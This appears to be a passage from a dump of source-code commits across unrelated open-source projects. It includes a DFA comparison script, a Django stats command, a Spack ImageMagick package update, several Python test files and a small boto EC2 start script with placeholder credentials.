res_list = ["%s/%s" % (word, weight_dict[word]) for word in phrase_seg_list]
else:
res_list = ["%s/%s" % (word, weight_dict[word] / weight_sum) for word in phrase_seg_list]
print "%s\t%s" % (phrase_str, " ".join(res_list))
else:
if weight_sum == 0.0:
res_list = ["%s%s" % (word, weight_dict[word]) for word in phrase_seg_list]
else:
res_list = ["%s%s" % (word, weight_dict[word] / weight_sum) for word in phrase_seg_list]
print "%s\t%s" % (phrase_str, "".join(res_list))
if __name__ == "__main__":
main()
| apache-2.0 | Python |
|
9e51fc305f21a4031b6ec94ccfa39ef1e611da9e | add script to compare DFAs. | sbc100/native_client,sbc100/native_client,sbc100/native_client,nacl-webkit/native_client,nacl-webkit/native_client,sbc100/native_client,sbc100/native_client,nacl-webkit/native_client,sbc100/native_client,nacl-webkit/native_client,nacl-webkit/native_client | src/trusted/validator_ragel/unreviewed/compare_dfa.py | src/trusted/validator_ragel/unreviewed/compare_dfa.py | #!/usr/bin/python
# Copyright (c) 2013 The Native Client Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import sys
import os
sys.path.append(os.path.join(os.path.dirname(__file__), '..'))
import dfa_parser
visited_pairs = set()
def Traverse(state1, state2, path):
if (state1, state2) in visited_pairs:
return
if state1.is_accepting != state2.is_accepting:
print map(hex, path)
print state1.is_accepting
print state2.is_accepting
sys.exit(1)
visited_pairs.add((state1, state2))
for byte in range(256):
new_path = path + [byte]
t1 = state1.forward_transitions.get(byte)
t2 = state2.forward_transitions.get(byte)
if (t1 is None) != (t2 is None):
print map(hex, new_path)
print t1 is not None
print t2 is not None
sys.exit(1)
if t1 is None:
continue
Traverse(t1.to_state, t2.to_state, new_path)
def main():
filename1, filename2 = sys.argv[1:]
_, start_state1 = dfa_parser.ParseXml(filename1)
_, start_state2 = dfa_parser.ParseXml(filename2)
Traverse(start_state1, start_state2, [])
print 'automata are equivalent'
if __name__ == '__main__':
main()
| bsd-3-clause | Python |
|
3cdee1d40d3370686c9bff435a4575e985c121e9 | Create __init__.py | odb9402/OPPA,odb9402/OPPA,odb9402/OPPA,odb9402/OPPA | pfc/__init__.py | pfc/__init__.py | """pfc"""
| mit | Python |
|
438471a4a3b41637c5c1eb3c2e07d9d8ca81ee09 | Add a stats ./manage.py command | UrLab/DocHub,UrLab/beta402,UrLab/beta402,UrLab/DocHub,UrLab/DocHub,UrLab/DocHub,UrLab/beta402 | www/management/commands/stats.py | www/management/commands/stats.py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
# Copyright 2014, Cercle Informatique ASBL. All rights reserved.
#
# This program is free software: you can redistribute it and/or modify it
# under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or (at
# your option) any later version.
#
# This software was made by hast, C4, ititou at UrLab, ULB's hackerspace
from django.core.management.base import BaseCommand
from users.models import User
from telepathy.models import Thread, Message
from documents.models import Document
class Command(BaseCommand):
help = 'Numbers on b402'
def handle(self, *args, **options):
Print = self.stdout.write
Print("User summary :\n")
Print("{} users\n".format(User.objects.count()))
Print("\n")
Print("Document summary :\n")
Print("{} documents\n".format(Document.objects.count()))
Print(" - {} IN_QUEUE\n".format(Document.objects.filter(state="IN_QUEUE").count()))
Print(" - {} PROCESSING\n".format(Document.objects.filter(state="PROCESSING").count()))
Print(" - {} PREPARING\n".format(Document.objects.filter(state="PREPARING").count()))
Print(" - {} READY_TO_QUEUE\n".format(Document.objects.filter(state="READY_TO_QUEUE").count()))
Print(" - {} ERROR\n".format(Document.objects.filter(state="ERROR").count()))
Print(" - {} DONE\n".format(Document.objects.filter(state="DONE").count()))
Print("\n")
Print("Thread summary :\n")
Print("{} threads\n".format(Thread.objects.count()))
Print("{} messages\n".format(Message.objects.count()))
Print("\n")
| agpl-3.0 | Python |
|
633e540a1718a5cc515725b13d3f1740bb950bb6 | Use GitHub URL for ImageMagick | lgarren/spack,matthiasdiener/spack,lgarren/spack,LLNL/spack,EmreAtes/spack,lgarren/spack,iulian787/spack,iulian787/spack,skosukhin/spack,EmreAtes/spack,LLNL/spack,matthiasdiener/spack,krafczyk/spack,tmerrick1/spack,skosukhin/spack,EmreAtes/spack,krafczyk/spack,skosukhin/spack,krafczyk/spack,tmerrick1/spack,mfherbst/spack,TheTimmy/spack,LLNL/spack,matthiasdiener/spack,krafczyk/spack,mfherbst/spack,mfherbst/spack,skosukhin/spack,krafczyk/spack,LLNL/spack,tmerrick1/spack,TheTimmy/spack,matthiasdiener/spack,LLNL/spack,TheTimmy/spack,lgarren/spack,TheTimmy/spack,EmreAtes/spack,iulian787/spack,mfherbst/spack,mfherbst/spack,EmreAtes/spack,tmerrick1/spack,lgarren/spack,skosukhin/spack,iulian787/spack,matthiasdiener/spack,tmerrick1/spack,iulian787/spack,TheTimmy/spack | var/spack/repos/builtin/packages/ImageMagick/package.py | var/spack/repos/builtin/packages/ImageMagick/package.py | ##############################################################################
# Copyright (c) 2013-2016, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, tgamblin@llnl.gov, All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/llnl/spack
# Please also see the LICENSE file for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
class Imagemagick(Package):
"""ImageMagick is a software suite to create, edit, compose,
or convert bitmap images."""
homepage = "http://www.imagemagick.org"
url = "https://github.com/ImageMagick/ImageMagick/archive/7.0.2-7.tar.gz"
version('7.0.2-7', 'c59cdc8df50e481b2bd1afe09ac24c08')
version('7.0.2-6', 'aa5689129c39a5146a3212bf5f26d478')
depends_on('jpeg')
depends_on('libtool', type='build')
depends_on('libpng')
depends_on('freetype')
depends_on('fontconfig')
depends_on('libtiff')
depends_on('ghostscript')
def url_for_version(self, version):
return "https://github.com/ImageMagick/ImageMagick/archive/{0}.tar.gz".format(version)
def install(self, spec, prefix):
configure('--prefix={0}'.format(prefix))
make()
make('check')
make('install')
| ##############################################################################
# Copyright (c) 2013-2016, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, tgamblin@llnl.gov, All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/llnl/spack
# Please also see the LICENSE file for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
class Imagemagick(Package):
"""ImageMagick is a software suite to create, edit, compose,
or convert bitmap images."""
homepage = "http://www.imagemagick.org"
url = "http://www.imagemagick.org/download/ImageMagick-7.0.2-6.tar.gz"
version('7.0.2-6', 'c29c98d2496fbc66adb05a28d8fad21a')
depends_on('jpeg')
depends_on('libtool', type='build')
depends_on('libpng')
depends_on('freetype')
depends_on('fontconfig')
depends_on('libtiff')
depends_on('ghostscript')
def install(self, spec, prefix):
configure('--prefix={0}'.format(prefix))
make()
make('check')
make('install')
| lgpl-2.1 | Python |
3ba109622c24bd52f32e605c523249e1c26b0207 | Add regression test with non ' ' space character as token | banglakit/spaCy,banglakit/spaCy,explosion/spaCy,Gregory-Howard/spaCy,Gregory-Howard/spaCy,raphael0202/spaCy,banglakit/spaCy,banglakit/spaCy,oroszgy/spaCy.hu,explosion/spaCy,recognai/spaCy,explosion/spaCy,oroszgy/spaCy.hu,explosion/spaCy,Gregory-Howard/spaCy,oroszgy/spaCy.hu,explosion/spaCy,banglakit/spaCy,recognai/spaCy,raphael0202/spaCy,recognai/spaCy,Gregory-Howard/spaCy,spacy-io/spaCy,raphael0202/spaCy,honnibal/spaCy,oroszgy/spaCy.hu,recognai/spaCy,aikramer2/spaCy,spacy-io/spaCy,raphael0202/spaCy,aikramer2/spaCy,Gregory-Howard/spaCy,aikramer2/spaCy,honnibal/spaCy,aikramer2/spaCy,aikramer2/spaCy,oroszgy/spaCy.hu,spacy-io/spaCy,recognai/spaCy,raphael0202/spaCy,aikramer2/spaCy,Gregory-Howard/spaCy,spacy-io/spaCy,banglakit/spaCy,spacy-io/spaCy,oroszgy/spaCy.hu,explosion/spaCy,raphael0202/spaCy,honnibal/spaCy,spacy-io/spaCy,honnibal/spaCy,recognai/spaCy | spacy/tests/regression/test_issue834.py | spacy/tests/regression/test_issue834.py | # coding: utf-8
from io import StringIO
word2vec_str = """, -0.046107 -0.035951 -0.560418
de -0.648927 -0.400976 -0.527124
. 0.113685 0.439990 -0.634510
-1.499184 -0.184280 -0.598371"""
def test_issue834(en_vocab):
f = StringIO(word2vec_str)
vector_length = en_vocab.load_vectors(f)
assert vector_length == 3
| mit | Python |
|
d11707e651d4b44ef706f62677ba6a617102f239 | Add test-code | kiyomaro927/bicamon,kiyomaro927/bicamon,kiyomaro927/bicamon | test/post_test.py | test/post_test.py | import json
import urllib2
data = {
"cells":["ECT","VISC", "AAA"]
}
req = urllib2.Request('http://localhost:5000/api')
req.add_header('Content-Type', 'application/json')
response = urllib2.urlopen(req, json.dumps(data))
| bsd-3-clause | Python |
|
480852bb1dd6796b7fb12e40edc924b9a4dbee60 | Add tests to cover no framework, no problem | undertherain/benchmarker,undertherain/benchmarker,undertherain/benchmarker,undertherain/benchmarker | test/test_misc.py | test/test_misc.py | import unittest
from .helpers import run_module
class MiscTests(unittest.TestCase):
def setUp(self):
self.name = "benchmarker"
def test_no_framework(self):
with self.assertRaises(Exception):
run_module(self.name)
def test_no_problem(self):
with self.assertRaises(Exception):
run_module(self.name, "--framework=pytorch")
| mpl-2.0 | Python |
|
ae372375a7160978eb56ef9b710027887a844d6f | add tests, now i am cool. | nickweinberg/werewolf-slackbot | test_app_input.py | test_app_input.py | """
Test sending data to process_message.
"""
import pytest
from plugins.werewolf import app
from plugins.werewolf.user_map import get_user_map, set_user_map, reset_user_map
def get_empty_game_state():
# hi there
# make mock game state.
# we'll have several fixtures
# and a basic one we can set up in each test.
return {'players':{},
'votes':{},
'STATUS': 'INACTIVE',
'ROUND': None
}
def get_fake_game_state():
return {
'players': {
'ab': {
'name': 'nick',
'DM': 'dm channel',
'role': 'v',
'side': 'v',
'status': 'alive'
},
'cd': {
'name': 'not_nick',
'dm': 'dm channel',
'role': 'w',
'side': 'w',
'status': 'alive'
}
},
'votes': {},
'STATUS': 'RUNNING',
'ROUND': 'night'
}
def setup_users(g):
# for users in g
# setup an appropriate user map.
for player in g['players'].keys():
set_user_map(g, player, g['players'][player]['name'])
def tear_down():
reset_user_map()
def test_setup_users():
night_g = get_fake_game_state()
setup_users(night_g)
test_user_map = get_user_map(night_g)
players = night_g['players'].keys()
p1_id = players[0]
p2_id = players[1]
assert test_user_map.id_dict[p1_id] == 'nick'
assert test_user_map.id_dict[p2_id] == 'not_nick'
assert test_user_map.name_dict['nick'] == p1_id
assert test_user_map.name_dict['not_nick'] == p2_id
tear_down()
def test_basic_input():
fake_message = {'text': 'sup noob', 'user':'ab'}
night_g = get_fake_game_state()
result = app.process_message(fake_message, night_g)
assert result == None
tear_down()
def test_no_vote_target_input():
fake_message = {'text': '!vote', 'user': 'ab'}
night_g = get_fake_game_state()
setup_users(night_g)
result = app.process_message(fake_message, night_g)
assert result == 'Not a valid command.'
tear_down()
def test_vote_user_not_in_game_input():
fake_message = {'text': '!vote cd', 'user': 'cat'}
night_g = get_fake_game_state()
setup_users(night_g)
message = app.process_message(fake_message, night_g)
assert message == 'User not in the game.'
tear_down()
def test_night_vote_input():
fake_message = {'text': '!vote not_nick', 'user': 'ab'}
night_g = get_fake_game_state()
setup_users(night_g)
message = app.process_message(fake_message, night_g)
assert message == 'It is not day.'
tear_down()
def test_day_voting_input():
fake_message = {'text': '!vote not_nick', 'user': 'ab'}
user_name = 'nick'
target_name = 'not_nick'
day_g = get_fake_game_state()
day_g['ROUND'] = 'day'
setup_users(day_g)
assert day_g['votes'] == {}
message = app.process_message(fake_message, day_g)
assert message == user_name + ' voted for ' + target_name
tear_down()
| mit | Python |
|
431760d7a840543901fc1ebc0069ecd384302101 | Add tests/conftest.py for py.test | klothe/pymssql,ramiro/pymssql,klothe/pymssql,zerolugithub/pymssql,JimDennis/pymssql,klothe/pymssql,pymssql/pymssql,bladams/pymssql,ramiro/pymssql,bladams/pymssql,bladams/pymssql,ramiro/pymssql,Aloomaio/pymssql,zerolugithub/pymssql,zerolugithub/pymssql,JimDennis/pymssql,Aloomaio/pymssql,pymssql/pymssql,JimDennis/pymssql,Aloomaio/pymssql | tests/conftest.py | tests/conftest.py | import decimal
import os
try:
# Python 2
from ConfigParser import ConfigParser
except ImportError:
# Python 3
from configparser import ConfigParser
import tests.helpers as th
from .helpers import cfgpath, clear_db, get_app_lock, release_app_lock
_parser = ConfigParser({
'server': 'localhost',
'username': 'sa',
'password': '',
'database': 'tempdb',
'port': '1433',
'ipaddress': '127.0.0.1',
'instance': '',
})
def pytest_addoption(parser):
parser.addoption(
"--pymssql-section",
type="string",
default=os.environ.get('PYMSSQL_TEST_CONFIG', 'DEFAULT'),
help="The name of the section to use from tests.cfg"
)
def pytest_configure(config):
_parser.read(cfgpath)
section = config.getoption('--pymssql-section')
if not _parser.has_section(section) and section != 'DEFAULT':
raise ValueError('the tests.cfg file does not have section: %s' % section)
th.config.server = os.getenv('PYMSSQL_TEST_SERVER') or _parser.get(section, 'server')
th.config.user = os.getenv('PYMSSQL_TEST_USERNAME') or _parser.get(section, 'username')
th.config.password = os.getenv('PYMSSQL_TEST_PASSWORD') or _parser.get(section, 'password')
th.config.database = os.getenv('PYMSSQL_TEST_DATABASE') or _parser.get(section, 'database')
th.config.port = os.getenv('PYMSSQL_TEST_PORT') or _parser.get(section, 'port')
th.config.ipaddress = os.getenv('PYMSSQL_TEST_IPADDRESS') or _parser.get(section, 'ipaddress')
th.config.instance = os.getenv('PYMSSQL_TEST_INSTANCE') or _parser.get(section, 'instance')
th.config.orig_decimal_prec = decimal.getcontext().prec
get_app_lock()
clear_db()
def pytest_unconfigure(config):
release_app_lock()
| lgpl-2.1 | Python |
|
bceee12d94924931ff73b45d2ed3de8b3d71522c | Add case fixture to top-level conftest.py in tests | amolenaar/gaphor,amolenaar/gaphor | tests/conftest.py | tests/conftest.py | import pytest
from gaphor.conftest import Case
@pytest.fixture
def case():
case = Case()
yield case
case.shutdown()
| lgpl-2.1 | Python |
|
0146058fe8a5c91ce33102bb55f5f087428a03a3 | Add tests for get_keeper_token | lsst-sqre/ltd-mason,lsst-sqre/ltd-mason | tests/test_cli.py | tests/test_cli.py | """Test the ltd-mason CLI features."""
from base64 import b64encode
import responses
import pytest
from ltdmason.cli import get_keeper_token
@responses.activate
def test_get_keeper_token():
"""Test getting a token from LTD Keeper."""
expected_json = {'token': 'shake-it-off-shake-it-off'}
responses.add(
responses.GET,
'http://localhost:5000/token',
json=expected_json,
status=200)
_auth_header = 'Basic ' + b64encode(('user:pass')
.encode('utf-8')).decode('utf-8')
token = get_keeper_token('http://localhost:5000', 'user', 'pass')
assert responses.calls[0].request.url == 'http://localhost:5000/token'
assert responses.calls[0].request.headers['Authorization'] \
== _auth_header
assert token == 'shake-it-off-shake-it-off'
@responses.activate
def test_get_keeper_token_error():
"""Test with server error."""
expected_json = {'token': 'shake-it-off-shake-it-off'}
responses.add(
responses.GET,
'http://localhost:5000/token',
json=expected_json,
status=401)
with pytest.raises(RuntimeError):
get_keeper_token('http://localhost:5000', 'user', 'pass')
| mit | Python |
|
e1e8bef8c2c916505e9bdc0ea37c81a7626db6af | Add int tests | nkantar/Parsenvy | tests/test_int.py | tests/test_int.py | import pytest
import parsenvy
def test_int_positive(monkeypatch):
"""'13'"""
monkeypatch.setenv("foo", "13")
assert parsenvy.int("foo") == 13
def test_int_negative(monkeypatch):
"""'-42'"""
monkeypatch.setenv("foo", "-42")
assert parsenvy.int("foo") == -42
def test_int_zero(monkeypatch):
"""'0'"""
monkeypatch.setenv("foo", "0")
assert parsenvy.int("foo") == 0
def test_int_negative_zero(monkeypatch):
"""'-0'"""
monkeypatch.setenv("foo", "-0")
assert parsenvy.int("foo") == 0
def test_int_invalid(monkeypatch):
"""'bar'"""
monkeypatch.setenv("foo", "bar")
with pytest.raises(TypeError):
parsenvy.int("foo")
def test_int_empty(monkeypatch):
"""''"""
monkeypatch.setenv("foo", "")
with pytest.raises(TypeError):
parsenvy.int("foo")
| bsd-3-clause | Python |
|
3b66fbc844b023003420db7a9986811110f55489 | Add tests for the run() function | Pythonity/icon-font-to-png | tests/test_run.py | tests/test_run.py | import sys
import tempfile
import unittest
try:
from StringIO import StringIO
except ImportError:
from io import StringIO
import icon_font_to_png
class TestRun(unittest.TestCase):
def create_css_file(self, contents):
css_file = tempfile.NamedTemporaryFile()
css_file.write(contents.encode('utf-8'))
css_file.flush()
return css_file
def test_usage(self):
orig_stderr = sys.stderr
sys.stderr = StringIO()
self.assertRaises(SystemExit, icon_font_to_png.run,
['icon_font_to_png.py'])
err = sys.stderr.getvalue().strip()
self.assertRegexpMatches(err, '^usage: .*')
sys.stderr = orig_stderr
def test_list(self):
css_file = self.create_css_file(
".foo-xyzzy:before { content: '\\f003' }\n"
".foo-baz:before { content: '\\f002' }\n"
".foo-bar:before { content: '\\f001' }\n"
)
orig_stdout = sys.stdout
sys.stdout = StringIO()
self.assertRaisesRegexp(SystemExit, '^0',
icon_font_to_png.run, ['foo.ttf', css_file.name, 'bar', '--list'])
out = sys.stdout.getvalue()
self.assertEqual(out,
"bar\n"
"baz\n"
"xyzzy\n"
)
sys.stdout = StringIO()
self.assertRaisesRegexp(SystemExit, '^0',
icon_font_to_png.run, ['foo.ttf', css_file.name, 'bar', '--list',
'--keep-prefix'])
out = sys.stdout.getvalue()
self.assertEqual(out,
"foo-bar\n"
"foo-baz\n"
"foo-xyzzy\n"
)
sys.stdout = orig_stdout
if __name__ == '__main__':
unittest.main
| mit | Python |
|
578de6c57f9698c7e273af06d1e815f71269bb18 | Add a sample python file interesting to debug | audaxis/ikpdb,audaxis/ikpdb | tests/to_debug.py | tests/to_debug.py | import sys
import os
import time
import threading
import ikpdb
TEST_MULTI_THREADING = False
TEST_EXCEPTION_PROPAGATION = False
TEST_POSTMORTEM = True
TEST_SYS_EXIT = 0
TEST_STEPPING = False
# Note that ikpdb.set_trace() will reset/mess breakpoints set using GUI
TEST_SET_TRACE = False
TCB = TEST_CONDITIONAL_BREAKPOINT = True
class Worker(object):
def __init__(self):
self._running = True
def terminate(self):
self._running = False
def run(self, n):
work_count = n
while self._running and n > 0:
print "Worker: Doing iteration: %s" % (work_count - n)
if n == 3:
pass # ikpdb.set_trace()
n -= 1
time.sleep(2)
ga = 5
gb ="coucou"
g_dict = {"Genesis": 1, "Don't Look Back": 2, 'array': [1,3,{'coucou': 3.14}]}
a_tuple = (1,'e', 3.14, ['a', 'b'])
class BigBear:
color = "white"
def __init__(self, name='unknown'):
self._name = name
def grumble(self):
print "Roaaarrrrrrr"
def sub_function():
return True
def the_function(p_nb_seconds):
a_var = 18.3
the_function_local_list = [1,2,3,'cyril']
a_beast = BigBear()
print "ga=%s" % ga
print "Hello World"
print "Ceci est la ligne avec le point d'arret"
for loop_idx in range(p_nb_seconds):
print "hello @ %s seconds" % loop_idx
time.sleep(1)
if loop_idx == 12:
if TEST_SET_TRACE:
ikpdb.set_trace() # will break on next line
pass # Need this for set_trace()
a_var = 98.3
sub_function()
def sub_raiser():
raise Exception("Prends ca dans ta bouille")
def raiser():
try:
sub_raiser()
except Exception as e:
raise e
if __name__=='__main__':
b = 0
main_bear = BigBear("Cyril")
print "Type of main_bear=%s" % type(main_bear)
print "sys.argv=%s" % sys.argv
if TEST_SYS_EXIT:
sys.exit(TEST_SYS_EXIT)
if TEST_EXCEPTION_PROPAGATION:
raiser()
if TEST_MULTI_THREADING:
w = Worker()
t = threading.Thread(target=w.run, args=(5,))
t.start()
duration = 2 if TEST_STEPPING else 15
the_function(duration)
if TEST_MULTI_THREADING:
w.terminate()
t.join()
print "finished"
if TEST_POSTMORTEM:
print 5 / b
| mit | Python |
|
329270ddef5f4da4528750ebc463ffc910325ec8 | add migration | pulilab/rapidpro,pulilab/rapidpro,pulilab/rapidpro,pulilab/rapidpro,pulilab/rapidpro | temba/channels/migrations/0066_auto_20170306_1713.py | temba/channels/migrations/0066_auto_20170306_1713.py | # -*- coding: utf-8 -*-
# Generated by Django 1.10.5 on 2017-03-06 17:13
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('channels', '0065_auto_20170228_0837'),
]
operations = [
migrations.AlterField(
model_name='channelsession',
name='status',
field=models.CharField(choices=[('P', 'Pending'), ('Q', 'Queued'), ('R', 'Ringing'), ('I', 'In Progress'), ('D', 'Complete'), ('B', 'Busy'), ('F', 'Failed'), ('N', 'No Answer'), ('C', 'Canceled'), ('X', 'Interrupted'), ('T', 'Triggered'), ('A', 'Initiated')], default='P', help_text='The status of this session', max_length=1),
),
]
| agpl-3.0 | Python |
|
a8caef202ba0fd6909359241ff385eca762aca1f | Add echo effect | martinmcbride/pysound | quack/effects.py | quack/effects.py | # Author: Martin McBride
# Created: 2018-09-25
# Copyright (C) 2018, Martin McBride
# License: MIT
import math
import numpy as np
from quack.buffer import create_buffer
def echo(params, source, delay, strength):
'''
Create an echo
:param params:
:param source:
:param delay:
:param strength:
:return:
'''
source = create_buffer(params, source)
delay = create_buffer(params, delay)
strength = create_buffer(params, strength)
output = source[:]
for i in range(params.length):
d = int(i - delay[i])
if 0 <= d < params.length:
output[i] += source[d]*strength[i]
return output
| mit | Python |
|
bdd7016fe8f41abdc8562d114efc41622916a675 | Create startBackEnd.py | fabiomssilva/AWSControl,fabiomssilva/AWSControl | startBackEnd.py | startBackEnd.py | #!/usr/bin/python
import boto.ec2
conn = boto.ec2.connect_to_region("eu-central-1", aws_access_key_id='AKIAI111111111111111', aws_secret_access_key='keyyyyy')
instance = conn.get_all_instances(instance_ids=['i-40eb8111'])
print instance[0].instances[0].start()
| mit | Python |
|
f6f2c6fc2a51bb3243d9b99ab1093809a2d1a5bb | Add script that tests AI players | giovannipcarvalho/dots-and-boxes | test_players.py | test_players.py | from AI import *
import random
def RandomPlayer(game):
return 0, random.choice(game.get_available_moves())
def ABPlayer(game):
return alpha_beta_search(game, 8, -np.inf, np.inf, True, evaluate_base)
def ABChainPlayer1(game):
return alpha_beta_search(game, 7, -np.inf, np.inf, True, evaluate_chain_len)
def ABChainPlayer2(game):
return alpha_beta_search(game, 7, -np.inf, np.inf, True, evaluate_chain_count)
players = [ABChainPlayer2, ABPlayer]
player_names = tuple((map(lambda x: x.__name__, players)))
print "%s v. %s" % player_names
game = DotsAndBoxes(-1, 4, 4)
while not game.is_over():
play_fn = players[game.turn == 1]
print "\tTurn: %s" % (player_names[game.turn == 1])
score, move = play_fn(game)
game.play(move)
print "\tPlayed: %d %d" % (move)
print "\tEvaluated score: %d\n" % (score)
print "Winner: %s" % (player_names[np.argmax(game.score)])
print game.score | mit | Python |
|
0cf85c1ab68ddc50787e6a09f3604320d18118b4 | Add UniqueForFieldsMixin | ashleywaite/django-more | django_more/mixins.py | django_more/mixins.py | from django.db.models.options import normalize_together
from django.utils.functional import cached_property
# Used by OrderByField to allow for unique_together constraints to be field declared
class UniqueForFieldsMixin:
""" Mixin first to a Field to add a unique_for_fields field option """
unique_for_fields = None
def __init__(self, unique_for_fields=None, *args, **kwargs):
if unique_for_fields:
self.unique_for_fields = tuple(unique_for_fields)
# If unique_for_fields then any unique option is irrelevant
kwargs.pop('unique', None)
super().__init__(*args, **kwargs)
def deconstruct(self):
name, path, args, kwargs = super().deconstruct()
if self.unique_for_fields:
kwargs['unique_for_fields'] = self.unique_for_fields
return name, path, args, kwargs
def contribute_to_class(self, cls, *args, **kwargs):
super().contribute_to_class(cls, *args, **kwargs)
# Add any necessary unique_together index to the model
if self.unique_for_fields:
# Alter only original_attr to fake being a declared unique_together
# Cannot modify cls._meta.unique_together as it breaks state consistency for migrations
ut = set((self.unique_together, )).union(normalize_together(cls._meta.original_attrs.get('unique_together')))
cls._meta.original_attrs['unique_together'] = ut
@cached_property
def unique_together(self):
return self.unique_for_fields + (self.attname, )
@cached_property
def unique_for_attnames(self):
return [self.model._meta.get_field(field_name).get_attname() for field_name in self.unique_for_fields]
| bsd-3-clause | Python |
|
419f86f5c50f812f19dd731e9c33f66e57f51a48 | Test matrix - work in progress | pycurl/pycurl,pycurl/pycurl,pycurl/pycurl | tests/matrix.py | tests/matrix.py | import os.path, urllib, subprocess, shutil
python_versions = ['2.4.6', '2.5.6', '2.6.8', '2.7.5']
libcurl_versions = ['7.19.0', '7.32.0']
class in_dir:
def __init__(self, dir):
self.dir = dir
def __enter__(self):
self.oldwd = os.getcwd()
os.chdir(self.dir)
def __exit__(self, type, value, traceback):
os.chdir(self.oldwd)
def fetch(url, archive):
if not os.path.exists(archive):
print "Fetching %s" % url
io = urllib.urlopen(url)
with open('.tmp.%s' % archive, 'w') as f:
while True:
chunk = io.read(65536)
if len(chunk) == 0:
break
f.write(chunk)
os.rename('.tmp.%s' % archive, archive)
def build(archive, dir, prefix):
if not os.path.exists(dir):
print "Building %s" % archive
subprocess.check_call(['tar', 'xf', archive])
with in_dir(dir):
subprocess.check_call(['./configure', '--prefix=%s' % prefix])
subprocess.check_call(['make'])
subprocess.check_call(['make', 'install'])
for python_version in python_versions:
url = 'http://www.python.org/ftp/python/%s/Python-%s.tgz' % (python_version, python_version)
archive = os.path.basename(url)
fetch(url, archive)
dir = archive.replace('.tgz', '')
prefix = os.path.abspath('i/%s' % dir)
build(archive, dir, prefix)
for libcurl_version in libcurl_versions:
url = 'http://curl.haxx.se/download/curl-%s.tar.gz' % libcurl_version
archive = os.path.basename(url)
fetch(url, archive)
dir = archive.replace('.tar.gz', '')
prefix = os.path.abspath('i/%s' % dir)
build(archive, dir, prefix)
fetch('https://raw.github.com/pypa/virtualenv/1.7/virtualenv.py', 'virtualenv-1.7.py')
if not os.path.exists('venv'):
os.mkdir('venv')
for python_version in python_versions:
for libcurl_version in libcurl_versions:
python_prefix = os.path.abspath('i/Python-%s' % python_version)
libcurl_prefix = os.path.abspath('i/curl-%s' % libcurl_version)
venv = os.path.abspath('venv/Python-%s-curl-%s' % (python_version, libcurl_version))
if os.path.exists(venv):
shutil.rmtree(venv)
subprocess.check_call(['python', 'virtualenv-1.7.py', venv, '-p', '%s/bin/python' % python_prefix])
with in_dir('pycurl'):
subprocess.check_call('make clean && . %s/bin/activate && make test' % venv, shell=True)
| lgpl-2.1 | Python |
|
c24647a921c64cfc8a1385f7e735622514e199c3 | make it clear that we don't depend on gabble version for the test | Ziemin/telepathy-gabble,mlundblad/telepathy-gabble,mlundblad/telepathy-gabble,community-ssu/telepathy-gabble,community-ssu/telepathy-gabble,jku/telepathy-gabble,community-ssu/telepathy-gabble,Ziemin/telepathy-gabble,Ziemin/telepathy-gabble,jku/telepathy-gabble,jku/telepathy-gabble,mlundblad/telepathy-gabble,community-ssu/telepathy-gabble,Ziemin/telepathy-gabble | tests/test-caps-update.py | tests/test-caps-update.py | """
Test that CapabilitiesChanged signal is emitted only once after
all the caps in the presence have been analyzed.
"""
import dbus
from twisted.words.xish import domish
from servicetest import match, unwrap, lazy
from gabbletest import go, make_result_iq
def make_presence(from_jid, type, status):
presence = domish.Element((None, 'presence'))
if from_jid is not None:
presence['from'] = from_jid
if type is not None:
presence['type'] = type
if status is not None:
presence.addElement('status', content=status)
return presence
def caps_iface(proxy):
return dbus.Interface(proxy,
'org.freedesktop.Telepathy.Connection.Interface.Capabilities')
@match('dbus-signal', signal='StatusChanged', args=[0, 1])
def expect_connected(event, data):
presence = make_presence('bob@foo.com/Foo', None, 'hello')
presence.addElement('priority', None, '0')
c = presence.addElement(('http://jabber.org/protocol/caps', 'c'))
c['node'] = 'http://telepathy.freedesktop.org/caps'
c['ver'] = '0.4.test-version'
c['ext'] = 'jingle-audio jingle-video'
data['stream'].send(presence)
return True
@lazy
@match('dbus-signal', signal='CapabilitiesChanged',
args=[[(2, u'org.freedesktop.Telepathy.Channel.Type.StreamedMedia', 0,
3, 0, 3)]])
def expect_CapabilitiesChanged(event, data):
data['conn_iface'].Disconnect()
return True
@match('dbus-signal')
def expect_disconnected(event, data):
assert event.signal != 'CapabilitiesChanged'
if event.signal == 'StatusChanged' and event.args == [2, 1]:
return True
return False
if __name__ == '__main__':
go()
|
"""
Test that CapabilitiesChanged signal is emitted only once after
all the caps in the presence have been analyzed.
"""
import dbus
from twisted.words.xish import domish
from servicetest import match, unwrap, lazy
from gabbletest import go, make_result_iq
def make_presence(from_jid, type, status):
presence = domish.Element((None, 'presence'))
if from_jid is not None:
presence['from'] = from_jid
if type is not None:
presence['type'] = type
if status is not None:
presence.addElement('status', content=status)
return presence
def caps_iface(proxy):
return dbus.Interface(proxy,
